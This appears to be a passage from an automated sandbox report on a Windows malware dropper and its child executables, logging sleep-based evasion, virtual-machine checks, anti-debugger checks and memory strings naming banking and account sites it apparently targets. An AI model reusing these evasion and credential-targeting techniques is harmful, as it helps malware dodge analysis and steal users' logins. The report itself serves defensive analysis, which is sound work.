                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe TID: 3488 | Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe TID: 880 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe TID: 6304 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe TID: 1012 | Thread sleep time: -210000s >= -30000s
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 64 | Thread sleep count: 658 > 30
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 64 | Thread sleep time: -658000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4872 | Thread sleep count: 101 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4872 | Thread sleep time: -202101s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4400 | Thread sleep count: 122 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4400 | Thread sleep time: -244122s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4876 | Thread sleep count: 114 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4876 | Thread sleep time: -228114s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 5648 | Thread sleep time: -32000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 5532 | Thread sleep time: -270000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 5664 | Thread sleep count: 125 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 5664 | Thread sleep time: -250125s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4948 | Thread sleep count: 94 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 4948 | Thread sleep time: -188094s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 704 | Thread sleep count: 117 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe TID: 704 | Thread sleep time: -234117s >= -30000s
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6488 | Thread sleep count: 739 > 30
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6488 | Thread sleep time: -739000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 1032 | Thread sleep count: 56 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 1032 | Thread sleep time: -112056s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5204 | Thread sleep count: 53 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5204 | Thread sleep time: -106053s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5196 | Thread sleep count: 53 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5196 | Thread sleep time: -106053s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 6212 | Thread sleep time: -44000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5512 | Thread sleep count: 53 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 5512 | Thread sleep time: -106053s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 428 | Thread sleep count: 46 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 428 | Thread sleep time: -92046s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 3616 | Thread sleep count: 48 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 3616 | Thread sleep time: -96048s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 512 | Thread sleep count: 55 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe TID: 512 | Thread sleep time: -110055s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 6996 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe TID: 4000 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe | Thread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: b9ba85c997.exe, 0000001D.00000003.2734137272.00000000059E4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696494690p
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp | Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: 7620ab885d.exe, 00000009.00000003.2061994993.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2175548971.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2153964986.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2186071731.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2154759324.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467998467.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467266806.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2289015343.000000000114E000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2316994067.0000000001165000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: skotes.exe, skotes.exe, 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp, 7620ab885d.exe, 7620ab885d.exe, 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2315387552.000000000090E000.00000040.00000001.01000000.0000000A.sdmp, b285303eae.exe, 0000001B.00000002.2818926847.0000000000287000.00000040.00000001.01000000.00000015.sdmp, b285303eae.exe, 0000001B.00000001.2507127937.0000000000287000.00000040.00000001.01000000.00000015.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
                    Source: 7620ab885d.exe, 00000009.00000003.2061994993.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2175548971.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2153964986.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2186071731.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2154759324.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467998467.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWf0'
                    Source: b285303eae.exe, 0000001B.00000003.2816284787.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000002.2825365325.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2788989135.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2814761965.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2695177861.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW*
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: cMTqzvmx9u.exe, 00000000.00000003.1468954895.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
                    Source: DJj.exe, 00000010.00000002.2490197433.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2289015343.000000000114E000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2316994067.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2314083807.000000000114F000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2139126772.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2223018332.0000000001162000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW w
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
                    Source: cMTqzvmx9u.exe, 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp, 7620ab885d.exe, 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2315387552.000000000090E000.00000040.00000001.01000000.0000000A.sdmp, b285303eae.exe, 0000001B.00000002.2818926847.0000000000287000.00000040.00000001.01000000.00000015.sdmp, b285303eae.exe, 0000001B.00000001.2507127937.0000000000287000.00000040.00000001.01000000.00000015.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
